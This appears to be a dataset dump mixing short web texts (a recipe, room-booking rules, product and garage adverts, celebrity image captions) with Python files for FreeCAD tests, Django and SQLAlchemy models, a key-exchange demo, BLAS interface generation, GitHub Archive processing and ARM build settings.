text
stringlengths 29
850k
|
|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# test script for TechDraw module
# creates a page, 1 view and 1 section view
from __future__ import print_function
import FreeCAD
import Part
import Measure
import TechDraw
import os
def DVSectionTest():
path = os.path.dirname(os.path.abspath(__file__))
print ('TDSection path: ' + path)
templateFileSpec = path + '/TestTemplate.svg'
FreeCAD.newDocument("TDSection")
FreeCAD.setActiveDocument("TDSection")
FreeCAD.ActiveDocument=FreeCAD.getDocument("TDSection")
box = FreeCAD.ActiveDocument.addObject("Part::Box","Box")
page = FreeCAD.ActiveDocument.addObject('TechDraw::DrawPage','Page')
FreeCAD.ActiveDocument.addObject('TechDraw::DrawSVGTemplate','Template')
FreeCAD.ActiveDocument.Template.Template = templateFileSpec
FreeCAD.ActiveDocument.Page.Template = FreeCAD.ActiveDocument.Template
page.Scale = 5.0
# page.ViewObject.show() # unit tests run in console mode
print("page created")
view = FreeCAD.ActiveDocument.addObject('TechDraw::DrawViewPart','View')
rc = page.addView(view)
view.Source = [box]
view.Direction = (0.0,0.0,1.0)
view.Rotation = 0.0
view.X = 30.0
view.Y = 150.0
print("view created")
section = FreeCAD.ActiveDocument.addObject('TechDraw::DrawViewSection','Section')
rc = page.addView(section)
section.Source = [box]
section.BaseView = view
section.Direction = (0.0,1.0,0.0)
section.SectionNormal = (0.0,1.0,0.0)
section.SectionOrigin = (5.0,5.0,5.0)
view.touch()
print("section created")
FreeCAD.ActiveDocument.recompute()
rc = False
if ("Up-to-date" in view.State) and ("Up-to-date" in section.State):
rc = True
FreeCAD.closeDocument("TDSection")
return rc
if __name__ == '__main__':
DVSectionTest()
|
I'm not sure whether it is the enticing labels or the flavors that float my boat (it's both!), but Maine Root sodas get me every time. And with it being October, the first full month of Fall with Halloween just around the corner, I'm a sucker for their Pumpkin Pie.
But better yet, you can try making your own Pumpkin Soda! If you're into that kind of thing, which I am... The easy way? Buy some pumpkin syrup and club soda. Add 3-5 pumps of syrup to the soda, and taste to your liking. Voila!
Alternatively, you can go really homemade with it. If you take a little extra time and put in a little extra effort, you'll have more control over the flavor and contents. Remember, as warm and inviting as pumpkin sounds, the squash itself is actually quite bland, so you'll need a spice or two, but then it's just three simple steps.
1) In a small pot, combine the water, spice, and sugar.
2) Bring it to a simmer on top of the stove until the sugar is dissolved into a simple syrup consistency.
3) Remove the pot from the heat and add the pumpkin puree.
After the mixture cools, add as much, or as little as you'd like to a cup of club soda for a homemade Halloween treat! The mixture will hold best when refrigerated. Or better yet, freeze some cubes of the mixture and add to soda for that extra flare.
|
from django.db import models
from django_extensions.db.models import TimeStampedModel
class Check(TimeStampedModel):
url = models.URLField()
no_of_recommendations = models.IntegerField(default=0)
runs_debug = models.BooleanField()
supports_https = models.BooleanField()
heartbleed_vuln = models.BooleanField()
hsts_header_found = models.BooleanField()
xframe_header_found = models.BooleanField()
admin_found = models.BooleanField()
admin_forces_https = models.NullBooleanField()
login_found = models.BooleanField()
login_forces_https = models.NullBooleanField()
allows_trace = models.BooleanField()
csrf_cookie_found = models.BooleanField()
session_cookie_found = models.BooleanField()
session_cookie_secure = models.NullBooleanField()
session_cookie_httponly = models.NullBooleanField()
def update_recommendation_count(self):
self.no_of_recommendations = 0
if self.runs_debug: self.no_of_recommendations += 1
if not self.supports_https: self.no_of_recommendations += 1
if self.heartbleed_vuln: self.no_of_recommendations += 1
if not self.hsts_header_found: self.no_of_recommendations += 1
if not self.xframe_header_found: self.no_of_recommendations += 1
if self.admin_found and not self.admin_forces_https: self.no_of_recommendations += 1
if self.login_found and not self.login_forces_https: self.no_of_recommendations += 1
if self.allows_trace: self.no_of_recommendations += 1
#if not self.csrf_cookie_found: self.no_of_recommendations += 1
if self.session_cookie_found and not self.session_cookie_secure: self.no_of_recommendations += 1
if self.session_cookie_found and not self.session_cookie_httponly: self.no_of_recommendations += 1
@property
def secure_percentage(self):
# worst is 10, best is 0
return int(100-round(10*self.no_of_recommendations))
@property
def proven_django(self):
return self.runs_debug or self.csrf_cookie_found or self.session_cookie_found or self.admin_found
|
Are you looking for the map of Krems an der Donau? Find any address on the map of Krems an der Donau or calculate your itinerary to and from Krems an der Donau, find all the tourist attractions and Michelin Guide restaurants in Krems an der Donau. The ViaMichelin map of Krems an der Donau: get the famous Michelin maps, the result of more than a century of mapping experience.
|
from nhxpoly.nhxpoly import NewHopeXSPolyBox
from newhope import newhope
from hashlib import sha256
"""This file shows a test run of
the NewHope_X25519_XSalsa20_Poly1305
key exchange protocol"""
user1 = NewHopeXSPolyBox()
user1.name = 'Alice'
user1.genPrekeyChunk()
user1.log('Prekey chunk created: %s' % repr([x for x in user1.prekey_chunk_1]))
user2 = NewHopeXSPolyBox()
user2.name = 'Bob'
user2.createSealedBox()
user1.setSenderPubKey(user2.pk)
user2.log('Created a X25519_XSalsa20_Poly1305 sealed box and sent public key to %s' % user1.name)
user1.encryptPrekeyChunk()
user1.log('Encrypted prekey chunk using the recieved X25519 Public Key via unidentifiable authentication.')
user2.enc_prekey_chunk_1 = user1.enc_prekey_chunk_1
user2.openSealedBox()
user2.log('First prekey chunk decrypted %s' % repr([x for x in user2.prekey_chunk_1]))
user1.genSeed()
user2.genSeed()
user1.initNewHope()
user1.genCommitmentHash()
user2.recv_commitment = user1.commitment #user1 sends commitment hash
user2.log('NewHope Seed commitment received with hash %s' % user2.recv_commitment)
user2.recv_message = user1.message
user2.recv_seed = user1.seed #user1 sends (reveals) seed
user2.verifyCommitment()
user2.log('Seed verification succeded. Authentic NewHope message recieved')
user2.message = newhope.sharedb(user1.message)
user1.log('NewHope initial authenticated message exchanged')
user2.genCommitmentHash()
user1.recv_commitment = user2.commitment #User2 sends commitment
user1.log('NewHope Seed commitment received with hash %s' % user1.recv_commitment)
user1.recv_message = user2.message
user1.recv_seed = user2.seed
user1.verifyCommitment()
user1.log('Seed verification succeded. Authentic NewHope message recieved')
user1.message = newhope.shareda(user2.message)
user1.log('NewHope final authenticated message exchanged')
user2.createNewHopeSharedKeyb()
user1.createNewHopeSharedKeya()
assert user2.shared_newhope_key == user1.shared_newhope_key
user2.log('NewHope shared key %s' % user2.shared_newhope_key)
user1.log('NewHope shared key %s' % user1.shared_newhope_key)
user2.combine_prekey_chunks()
user1.combine_prekey_chunks()
user2.log('Combined prekey %s' % user2.prekey)
user1.log('Combined prekey %s' % user1.prekey)
print('NewHope_X25519_XSalsa20_Poly1305 key exchange successful.')
print('Pre-key ready for key derivation..')
#Very simple possible key-derivation...
def derive(prekey):
prekey = ''.join([chr(_) for _ in prekey])
prekey = prekey.encode()
return sha256(prekey).hexdigest()
user1.log('Derived key:' + derive(user1.prekey))
user2.log('Derived key:' + derive(user2.prekey))
assert derive(user1.prekey) == derive(user2.prekey)
print('Derived keys match!')
|
The library is open, with 5 new conference rooms ready for you to enjoy! All library conference rooms have been added to the room scheduler which is managed through the Student Affairs Office. These rooms are great for small group meetings, rounds, or private study sessions and hold as few as 8 and up to 19 individuals. When the rooms are not scheduled they are open on a first come; first serve basis.
Student Affairs now also manages the reservations of the PBL Lab (Computer Lab) on the 2nd floor (for course related reservations only) when the majority of the lab will be in use. Such reservations can only be requested by Faculty/Staff. No student, club, or individual reservations will be honored. When the rooms or computer stations are not scheduled they are open on a first come; first serve basis.
Who Can Schedule a Room?
LSU SVM Faculty, Staff, and Students can schedule rooms for events, lectures, meetings, office parties, training or courses.
Although room reservations are taken on a first come first serve basis, SVM core curriculum courses take precedent over all other reservations whether or not there is a reservation in place. Every attempt will be made to place a standing invitation into a new location when possible.
Club meetings will only be honored by clubs who fill out the appropriate club registration information.
Always check the scheduler before using a room!
VCS Conference Rooms and Lab are not scheduled through the Student Affairs Office.
Rooms 1840 and 2313 are coordinated by Kevin Oubre at koubre2@lsu.edu.
Room 1301 B is coordinated by Sarah Keeton at sorlik1@lsu.edu.
|
#!/usr/bin/env python
import os
import re
from distutils.dir_util import mkpath
def all_subroutines(interface_in):
# remove comments
comment_block_exp = re.compile(r'/\*(?:\s|.)*?\*/')
subroutine_exp = re.compile(r'subroutine (?:\s|.)*?end subroutine.*')
function_exp = re.compile(r'function (?:\s|.)*?end function.*')
interface = comment_block_exp.sub('',interface_in)
subroutine_list = subroutine_exp.findall(interface)
function_list = function_exp.findall(interface)
subroutine_list = subroutine_list + function_list
subroutine_list = map(lambda x: x.strip(),subroutine_list)
return subroutine_list
def real_convert(val_string):
return val_string
def complex_convert(val_string):
return '(' + val_string + ',0.)'
def convert_types(interface_in,converter):
regexp = re.compile(r'<type_convert=(.*?)>')
interface = interface_in[:]
while 1:
sub = regexp.search(interface)
if sub is None: break
converted = converter(sub.group(1))
interface = interface.replace(sub.group(),converted)
return interface
def generic_expand(generic_interface,skip_names=[]):
generic_types ={'s' :('real', 'real', real_convert,
'real'),
'd' :('double precision','double precision',real_convert,
'double precision'),
'c' :('complex', 'complex',complex_convert,
'real'),
'z' :('double complex', 'double complex',complex_convert,
'double precision'),
'cs':('complex', 'real',complex_convert,
'real'),
'zd':('double complex', 'double precision',complex_convert,
'double precision'),
'sc':('real', 'complex',real_convert,
'real'),
'dz':('double precision','double complex', real_convert,
'double precision')}
generic_c_types = {'real':'float',
'double precision':'double',
'complex':'complex_float',
'double complex':'complex_double'}
# cc_types is specific in ATLAS C BLAS, in particular, for complex arguments
generic_cc_types = {'real':'float',
'double precision':'double',
'complex':'void',
'double complex':'void'}
#2. get all subroutines
subs = all_subroutines(generic_interface)
print len(subs)
#loop through the subs
type_exp = re.compile(r'<tchar=(.*?)>')
TYPE_EXP = re.compile(r'<TCHAR=(.*?)>')
routine_name = re.compile(r'(subroutine|function)\s*(?P<name>\w+)\s*\(')
interface = ''
for sub in subs:
#3. Find the typecodes to use:
m = type_exp.search(sub)
if m is None:
interface = interface + '\n\n' + sub
continue
type_chars = m.group(1)
# get rid of spaces
type_chars = type_chars.replace(' ','')
# get a list of the characters (or character pairs)
type_chars = type_chars.split(',')
# Now get rid of the special tag that contained the types
sub = re.sub(type_exp,'<tchar>',sub)
m = TYPE_EXP.search(sub)
if m is not None:
sub = re.sub(TYPE_EXP,'<TCHAR>',sub)
sub_generic = sub.strip()
for char in type_chars:
type_in,type_out,converter, rtype_in = generic_types[char]
sub = convert_types(sub_generic,converter)
function_def = sub.replace('<tchar>',char)
function_def = function_def.replace('<TCHAR>',char.upper())
function_def = function_def.replace('<type_in>',type_in)
function_def = function_def.replace('<type_in_c>',
generic_c_types[type_in])
function_def = function_def.replace('<type_in_cc>',
generic_cc_types[type_in])
function_def = function_def.replace('<rtype_in>',rtype_in)
function_def = function_def.replace('<rtype_in_c>',
generic_c_types[rtype_in])
function_def = function_def.replace('<type_out>',type_out)
function_def = function_def.replace('<type_out_c>',
generic_c_types[type_out])
m = routine_name.match(function_def)
if m:
if m.group('name') in skip_names:
print 'Skipping',m.group('name')
continue
else:
print 'Possible bug: Failed to determine routines name'
interface = interface + '\n\n' + function_def
return interface
#def interface_to_module(interface_in,module_name,include_list,sdir='.'):
def interface_to_module(interface_in,module_name):
pre_prefix = "!%f90 -*- f90 -*-\n"
# heading and tail of the module definition.
file_prefix = "\npython module " + module_name +" ! in\n" \
"!usercode '''#include \"cblas.h\"\n"\
"!'''\n"\
" interface \n"
file_suffix = "\n end interface\n" \
"end module %s" % module_name
return pre_prefix + file_prefix + interface_in + file_suffix
def process_includes(interface_in,sdir='.'):
include_exp = re.compile(r'\n\s*[^!]\s*<include_file=(.*?)>')
include_files = include_exp.findall(interface_in)
for filename in include_files:
f = open(os.path.join(sdir,filename))
interface_in = interface_in.replace('<include_file=%s>'%filename,
f.read())
f.close()
return interface_in
def generate_interface(module_name,src_file,target_file,skip_names=[]):
print "generating",module_name,"interface"
f = open(src_file)
generic_interface = f.read()
f.close()
sdir = os.path.dirname(src_file)
generic_interface = process_includes(generic_interface,sdir)
generic_interface = generic_expand(generic_interface,skip_names)
module_def = interface_to_module(generic_interface,module_name)
mkpath(os.path.dirname(target_file))
f = open(target_file,'w')
user_routines = os.path.join(sdir,module_name+"_user_routines.pyf")
if os.path.exists(user_routines):
f2 = open(user_routines)
f.write(f2.read())
f2.close()
f.write(module_def)
f.close()
def process_all():
# process the standard files.
for name in ['fblas','cblas','clapack','flapack']:
generate_interface(name,'generic_%s.pyf'%(name),name+'.pyf')
if __name__ == "__main__":
process_all()
|
Remember you found this company at Infoisinfo 020 8764 114?
Welcome Central Garage (Streatham) Ltd is a professionally run garage which has been established for over 50 years. Body Repairs, Car Repairs, Car Mechanics, Body Work, Car Servicing and Vehicle Repairs. We are Vehicle Air Conditioning Specialists for all makes. * Mechanical/Electrical/Diesel Engineers * Specialists in Rover Vehicles * Servicing for all Makes * Body repairs - Vehicle Recovery. Garage Maintenance and Repair Services Your local garage for over 50 years. All of our new parts comes with a 12 month guarantee. Our business is built on a reputation for excellent service and high quality workmanship. In addition to our garage services, we offer a range of air conditioning work including repair and maintenance. We are specialists in the maintenance and repair of Rover vehicles. We also offer body repair and general maintenance. We are able to provide a range of servicing, fault finding and diagnostic solutions for all models. Our Services Our business offers a comprehensive range of general garage services and vehicle air conditioning for private and business vehicles. Central Garage Streatham Ltd is a member of the Retail Motor Industry Federation and the Good Garage Scheme.com. For further information or if you have any queries contact the number above. About Us Central Garage Streatham Ltd are based in Streatham, car servicing, car repairs, car mechanics, body work, car body repairs, London specializing in car air-conditioning, vehicle repairs. We offer vehicle recovery across South West London. We are based at Streatham Common South. Motor Trade Associations Retail Motor Industry Federation.
|
"""
Mostly a copy of (django-registration/)registration/backends/default/urls.py and
registration/auth_urls.py, but using our own backends:
* UsernameLessAuthenticationBackend for authentication
* UsernameLessRegistrationBackend for registration
"""
from django.conf.urls.defaults import *
from django.views.generic.simple import direct_to_template
from django.contrib.sites.models import Site
from django.contrib.auth import views as auth_views
from registration.views import activate
from registration.views import register
from forms import UsernameLessAuthenticationForm
auth_urls = patterns('',
url(r'^login/$',
auth_views.login,
{'template_name': 'registration/login.html',
'authentication_form': UsernameLessAuthenticationForm, },
name='auth_login'),
url(r'^logout/$',
auth_views.logout,
{'template_name': 'registration/logout.html'},
name='auth_logout'),
url(r'^password/change/$',
auth_views.password_change,
name='auth_password_change'),
url(r'^password/change/done/$',
auth_views.password_change_done,
name='auth_password_change_done'),
url(r'^password/reset/$',
auth_views.password_reset,
name='auth_password_reset'),
url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$',
auth_views.password_reset_confirm,
name='auth_password_reset_confirm'),
url(r'^password/reset/complete/$',
auth_views.password_reset_complete,
name='auth_password_reset_complete'),
url(r'^password/reset/done/$',
auth_views.password_reset_done,
name='auth_password_reset_done'),
)
urlpatterns = patterns('',
url(r'^activate/complete/$',
direct_to_template,
{
'template': 'registration/activation_complete.html',
'extra_context': { 'site' : Site.objects.get_current() },
}, name='registration_activation_complete'),
# Activation keys get matched by \w+ instead of the more specific
# [a-fA-F0-9]{40} because a bad activation key should still get to the view;
# that way it can return a sensible "invalid key" message instead of a
# confusing 404.
url(r'^activate/(?P<activation_key>\w+)/$',
activate,
{'backend': 'usernameless.auth.UsernameLessRegistrationBackend'},
name='registration_activate'),
url(r'^register/$',
register,
{'backend': 'usernameless.auth.UsernameLessRegistrationBackend'},
name='registration_register'),
url(r'^register/complete/$',
direct_to_template,
{
'template': 'registration/registration_complete.html',
'extra_context': { 'site' : Site.objects.get_current() },
}, name='registration_complete'),
url(r'^register/closed/$',
direct_to_template,
{'template': 'registration/registration_closed.html'},
name='registration_disallowed'),
(r'', include(auth_urls)),
)
|
Our Rosa top is made using the softest eyelash lace. Flirty and fun in a cropped-style, Rosa pairs well over the Sienna satin cami and worn with the Kyla mesh, or Mila tulle skirt.
Our Rosa lace top comes in two colours, burgundy or ivory and can be ordered with our without the delicate cap sleeve.
|
import sqlalchemy as sa
from meta import Base
from meta import Session
from lib.model import CommaList
from person import Person
from registration import Registration
from registration_product import RegistrationProduct
class RegoNote(Base):
"""Misc notes from the organising team on a person
"""
__tablename__ = 'rego_note'
id = sa.Column(sa.types.Integer, primary_key=True)
rego_id = sa.Column(sa.types.Integer, sa.ForeignKey('registration.id'))
note = sa.Column(sa.types.Text)
block = sa.Column(sa.types.Boolean, nullable=False)
by_id = sa.Column(sa.types.Integer, sa.ForeignKey('person.id'), nullable=False)
creation_timestamp = sa.Column(sa.types.DateTime, nullable=False, default=sa.func.current_timestamp())
last_modification_timestamp = sa.Column(sa.types.DateTime, nullable=False, default=sa.func.current_timestamp(), onupdate=sa.func.current_timestamp())
# relations
by = sa.orm.relation(Person, backref=sa.orm.backref('notes_made', cascade="all, delete-orphan", lazy=True))
rego = sa.orm.relation(Registration, backref=sa.orm.backref('notes', cascade="all, delete-orphan", lazy=True))
def __init__(self, **kwargs):
super(RegoNote, self).__init__(**kwargs)
@classmethod
def find_by_id(cls, id, abort_404 = True):
result = Session.query(RegoNote).filter_by(id=id).first()
if result is None and abort_404:
abort(404, "No such rego note object")
return result
@classmethod
def find_all(cls):
return Session.query(RegoNote).order_by(RegoNote.id).all()
|
Selection of student is done irrespective of caste, creed and religion etc. The candidate should be certified by a family doctor that he is capable doing Technical work. Mentally challenged,borderline intelligence candidates are admitted provided they are capable of doing simple functions and capable of following simple instructions. They have to produce a medical certificate as well as their IQ test report.
The candidate should be above 16 years & above. If a candidate doesn’t have any parent then he should at least have a guardian/relative/or an organization who can take responsibility.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import os.path
import re
import json
import requests
import shutil
import gzip
from tempfile import NamedTemporaryFile
import StringIO
from datetime import date
from collections import defaultdict
from .db import redis, mongodb, pipe as _pipe, format_key as _format
# The URL template for the GitHub Archive.
archive_url = ("http://data.githubarchive.org/"
"{year}-{month:02d}-{day:02d}-{hour}.json.gz")
local_url = "./data/{year}-{month:02d}-{day:02d}-{hour}.json.gz"
date_re = re.compile(r"([0-9]{4})-([0-9]{2})-([0-9]{2})-([0-9]+)\.json.gz")
# mkdir data directory
os.path.exists('./data') or os.mkdir('./data')
def fetch_one(year, month, day, hour):
'''Fecch one archived timeline.'''
local_fn = local_url.format(year=year, month=month, day=day, hour=hour)
if os.path.exists(local_fn):
print '%s exists.' % local_fn
return local_fn
else:
url = archive_url.format(year=year, month=month, day=day, hour=hour)
r = None
try:
r = requests.get(url, timeout=120)
if r.status_code == 200:
f = NamedTemporaryFile("wb", delete=False)
f.write(r.content)
f.flush()
os.fsync(f.fileno())
f.close()
shutil.move(f.name, local_fn)
print("Fetching %s successded." % url)
return local_fn
else:
print("Fetching %s failed." % url)
except:
return None
finally:
if r is not None:
r.close()
return None
def _gen_json(buf):
line = buf.readline()
while line:
try:
yield json.loads(line)
except Exception as e:
print "Error during load json: %s" % e
line = buf.readline()
def file_process(filename, fns):
if not filename or not os.path.exists(filename):
return
fns = fns if type(fns) is list else [fns]
year, month, day, hour = map(int, date_re.findall(filename)[0])
r = redis()
repl = lambda m: ''
for fn in fns:
print('Processing %s with %s' % (filename, fn.__name__))
fn_key = _format('function:%s' % fn.__name__)
fn_value = "{year}-{month:02d}-{day:02d}-{hour}".format(
year=year, month=month, day=day, hour=hour
)
if not r.sismember(fn_key, fn_value):
with gzip.GzipFile(filename) as f:
content = f.read().decode("utf-8", errors="ignore")
content = re.sub(u"[^\\}]([\\n\\r\u2028\u2029]+)[^\\{]", repl, content)
content = '}\n{"'.join(content.split('}{"'))
buf = StringIO.StringIO(content)
fn(_gen_json(buf), year, month, day, hour)
r.sadd(fn_key, fn_value)
def _mongo_default():
return defaultdict(lambda: defaultdict(int))
def events_process(events, year, month, day, hour):
'''main events process method.'''
weekday = date(year=year, month=month, day=day).strftime("%w")
year_month = "{year}-{month:02d}".format(year=year, month=month)
pipe = _pipe()
users = defaultdict(_mongo_default)
repos = defaultdict(_mongo_default)
languages = defaultdict(_mongo_default)
for event in events:
actor = event["actor"]
attrs = event.get("actor_attributes", {})
if actor is None or attrs.get("type") != "User":
# This was probably an anonymous event (like a gist event)
# or an organization event.
continue
# Normalize the user name.
key = actor.lower()
# Get the type of event.
evttype = event["type"]
nevents = 1
# Can this be called a "contribution"?
contribution = evttype in ["IssuesEvent", "PullRequestEvent",
"PushEvent"]
# Increment the global sum histograms.
pipe.incr(_format("total"), nevents)
pipe.hincrby(_format("day"), weekday, nevents)
pipe.hincrby(_format("hour"), hour, nevents)
pipe.hincrby(_format("month"), year_month, nevents)
pipe.zincrby(_format("user"), key, nevents)
pipe.zincrby(_format("event"), evttype, nevents)
# Event histograms.
pipe.hincrby(_format("event:{0}:day".format(evttype)),
weekday, nevents)
pipe.hincrby(_format("event:{0}:hour".format(evttype)),
hour, nevents)
pipe.hincrby(_format("evnet:{0}:month".format(evttype)),
year_month, nevents)
# User schedule histograms.
incs = [
'total',
'day.%s' % weekday,
'hour.%02d' % hour,
'month.%04d.%02d' % (year, month),
'event.%s.day.%s' % (evttype, weekday),
'event.%s.hour.%02d' % (evttype, hour),
'event.%s.month.%04d.%02d' % (evttype, year, month)
]
for inc in incs:
users[key]['$inc'][inc] += nevents
# Parse the name and owner of the affected repository.
repo = event.get("repository", {})
owner, name, org = (repo.get("owner"), repo.get("name"),
repo.get("organization"))
if owner and name:
repo_name = "{0}/{1}".format(owner, name)
# Save the social graph.
users[key]['repos'][repo_name] += nevents
repos[repo_name]['$inc']['total'] += nevents
repos[repo_name]['$inc']['events.%s' % evttype] += nevents
repos[repo_name]['$inc']['users.%s' % key] += nevents
# Do we know what the language of the repository is?
language = repo.get("language")
if language:
# Which are the most popular languages?
languages[language]['$inc']['total'] += nevents
languages[language]['$inc']['events.%s' % evttype] += nevents
languages[language]['$inc']['month.%d.%2d' % (year, month)] += nevents
# The most used language of users
users[key]['$inc']['lang.%s' % language] += nevents
# Who are the most important users of a language?
if contribution:
pipe.zincrby(_format("lang:{0}:user".format(language)),
key, nevents)
users_stats = mongodb().users_stats
for key in users:
users_stats.update({'_id': key}, {'$inc': users[key]['$inc']}, True)
for repo_name in users[key]['repos']:
users_stats.update(
{'_id': key, 'repos.repo': {'$ne': repo_name}},
{'$addToSet': {'repos': {'repo': repo_name, 'events': 0}}},
False
)
users_stats.update(
{'_id': key, 'repos.repo': repo_name},
{'$inc': {'repos.$.events': users[key]['repos'][repo_name]}},
False
)
del users
languages_stats = mongodb().languages
for key in languages:
languages_stats.update({'_id': key},
{'$inc': languages[key]['$inc']},
True)
del languages
repos_stats = mongodb().repositories
for key in repos:
repos_stats.update({'_id': key},
{'$inc': repos[key]['$inc']},
True)
del repos
pipe.execute()
def events_process_lang_contrib(events, year, month, day, hour):
'''lang contribution process method.'''
users = defaultdict(_mongo_default)
for event in events:
actor = event["actor"]
attrs = event.get("actor_attributes", {})
if actor is None or attrs.get("type") != "User":
# This was probably an anonymous event (like a gist event)
# or an organization event.
continue
# Normalize the user name.
key = actor.lower()
# Get the type of event.
evttype = event["type"]
nevents = 1
# Can this be called a "contribution"?
contribution = evttype in ["IssuesEvent", "PullRequestEvent", "PushEvent"]
repo = event.get("repository", {})
owner, name, org, language = (repo.get("owner"),
repo.get("name"),
repo.get("organization"),
repo.get("language"))
if owner and name and language and contribution:
# The most used language of users
users[key]['$inc']['contrib.%s.%d.%02d' % (language, year, month)] += nevents
users_stats = mongodb().users_stats
for key in users:
users_stats.update({'_id': key}, {'$inc': users[key]['$inc']}, True)
del users
|
ashlee simpson good morning america - ashlee simpson evan ross interview on good morning .
ashlee simpson good morning america - ashlee simpson taught evan ross to really be yourself on .
ashlee simpson good morning america - jessica simpson good morning america photo 1409771 .
ashlee simpson good morning america - jessica simpson good morning america photo 1409911 .
ashlee simpson good morning america - jessica simpson good morning america photo 1409871 .
ashlee simpson good morning america - jessica simpson appears on good morning america moejackson .
ashlee simpson good morning america - jessica simpson 2014 photos jessica simpson leaving good .
ashlee simpson good morning america - jessica simpson good morning america photo 1409751 .
ashlee simpson good morning america - jessica and ashley simpson upi .
ashlee simpson good morning america - jessica simpson gma 05 19907 photos the blemish .
ashlee simpson good morning america - evan ross shares pictures from ashlee simpson wedding .
ashlee simpson good morning america - jessica simpson tongue stock photos and pictures getty .
ashlee simpson good morning america - inside ashlee simpson and evan ross s engagement party .
ashlee simpson good morning america - jessica simpson photos photos jennifer aniston and .
ashlee simpson good morning america - jessica simpson photos photos jessica simpson performs .
ashlee simpson good morning america - evan ross wants as many kids as possible with wife .
ashlee simpson good morning america - ashlee simpson and evan ross welcome a baby girl abc news .
ashlee simpson good morning america - everything you need to know about ashlee simpson s fiance .
ashlee simpson good morning america - shaq and kyrie irving dish on uncle drew live on gma .
ashlee simpson good morning america - ashlee simpson spends time with her new family abc news .
ashlee simpson good morning america - jessica simpson .
ashlee simpson good morning america - photo ashlee simpson steps out with diana ross s son .
ashlee simpson good morning america - ashlee simpson announces evan ross engagement mtv uk .
ashlee simpson good morning america - jessica simpson hot pictures jessica simpson on abc s .
ashlee simpson good morning america - evan ross videos and b roll footage getty images .
ashlee simpson good morning america - jessica and ashlee simpson s ruby and diamond rings which .
|
from catalyst import builder
class generic_arm(builder.generic):
"Abstract base class for all arm (little endian) builders"
def __init__(self,myspec):
builder.generic.__init__(self,myspec)
self.settings["CFLAGS"]="-O2 -pipe"
class generic_armeb(builder.generic):
"Abstract base class for all arm (big endian) builders"
def __init__(self,myspec):
builder.generic.__init__(self,myspec)
self.settings["CFLAGS"]="-O2 -pipe"
class arch_arm(generic_arm):
"Builder class for arm (little endian) target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="arm-unknown-linux-gnu"
class arch_armeb(generic_armeb):
"Builder class for arm (big endian) target"
def __init__(self,myspec):
generic_armeb.__init__(self,myspec)
self.settings["CHOST"]="armeb-unknown-linux-gnu"
class arch_armv4l(generic_arm):
"Builder class for armv4l target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv4l-unknown-linux-gnu"
self.settings["CFLAGS"]+=" -march=armv4"
class arch_armv4tl(generic_arm):
"Builder class for armv4tl target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv4tl-softfloat-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv4t"
class arch_armv5tl(generic_arm):
"Builder class for armv5tl target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv5tl-softfloat-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv5t"
class arch_armv5tel(generic_arm):
"Builder class for armv5tel target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv5tel-softfloat-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv5te"
class arch_armv5tejl(generic_arm):
"Builder class for armv5tejl target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv5tejl-softfloat-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv5te"
class arch_armv6j(generic_arm):
"Builder class for armv6j target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv6j-softfp-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv6j -mfpu=vfp -mfloat-abi=softfp"
class arch_armv6z(generic_arm):
"Builder class for armv6z target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv6z-softfp-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv6z -mfpu=vfp -mfloat-abi=softfp"
class arch_armv6zk(generic_arm):
"Builder class for armv6zk target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv6zk-softfp-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv6zk -mfpu=vfp -mfloat-abi=softfp"
class arch_armv7a(generic_arm):
"Builder class for armv7a target"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv7a-softfp-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv7-a -mfpu=vfpv3-d16 -mfloat-abi=softfp"
class arch_armv6j_hardfp(generic_arm):
"Builder class for armv6j hardfloat target, needs >=gcc-4.5"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv6j-hardfloat-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv6j -mfpu=vfp -mfloat-abi=hard"
class arch_armv7a_hardfp(generic_arm):
"Builder class for armv7a hardfloat target, needs >=gcc-4.5"
def __init__(self,myspec):
generic_arm.__init__(self,myspec)
self.settings["CHOST"]="armv7a-hardfloat-linux-gnueabi"
self.settings["CFLAGS"]+=" -march=armv7-a -mfpu=vfpv3-d16 -mfloat-abi=hard"
class arch_armv5teb(generic_armeb):
"Builder class for armv5teb (XScale) target"
def __init__(self,myspec):
generic_armeb.__init__(self,myspec)
self.settings["CFLAGS"]+=" -mcpu=xscale"
self.settings["CHOST"]="armv5teb-softfloat-linux-gnueabi"
def register():
"Inform main catalyst program of the contents of this plugin."
return ({
"arm" : arch_arm,
"armv4l" : arch_armv4l,
"armv4tl": arch_armv4tl,
"armv5tl": arch_armv5tl,
"armv5tel": arch_armv5tel,
"armv5tejl": arch_armv5tejl,
"armv6j" : arch_armv6j,
"armv6z" : arch_armv6z,
"armv6zk" : arch_armv6zk,
"armv7a" : arch_armv7a,
"armv6j_hardfp" : arch_armv6j_hardfp,
"armv7a_hardfp" : arch_armv7a_hardfp,
"armeb" : arch_armeb,
"armv5teb" : arch_armv5teb
}, ("arm", "armv4l", "armv4tl", "armv5tl", "armv5tel", "armv5tejl", "armv6l",
"armv7l", "armeb", "armv5teb") )
|
